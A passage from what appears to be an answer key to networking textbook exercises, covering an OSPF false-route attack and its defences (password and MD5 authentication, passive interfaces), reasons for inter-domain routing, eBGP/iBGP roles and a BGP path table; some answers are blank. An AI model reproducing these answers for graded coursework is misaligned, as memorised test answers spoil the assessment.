(d). No, the first and last IP addresses of the false network are 8.9.7.80 and 8.9.7.95, respectively.
The webserver’s IP address does not fall within that range. Thus, all traffic destined for the
website will not go to the attacker, but towards the webserver as normal.
(e):
Solution #1 a simple plaintext password: added to all LSPs so each router can
authenticate the information it is receiving.
Solution #2 an MD5-hash of the OSPF packet and a shared secret key: in OSPF, routers can send
the hash of the OSPF packet and a shared secret key along with their LSP to authenticate
themselves with other routers.
Solution #3 passive interface: once a network administrator sets up a passive interface on a
router, the router will ignore all routing information being sent over that interface.
(f) The Network Administrator
Chapter 17
10.
Scalability - Routing tables would become huge.
Administration - owners of individual networks may want to set their own rules for routing
within their networks, without being concerned with what rules others are electing to follow.
11.
San Fran: eBGP; Washington: neither; Paris: eBGP and iBGP; Bonn: neither
Chapter 18
5.
6.
R4 BGP Path Table
Networks          Next    AS
N8, N9            R1      AS1, AS2
N10, N11, N12     R1      AS1, AS3
N13, N14, N15     R9      AS1, AS4
Total Cost: 3+3+3+1 = 10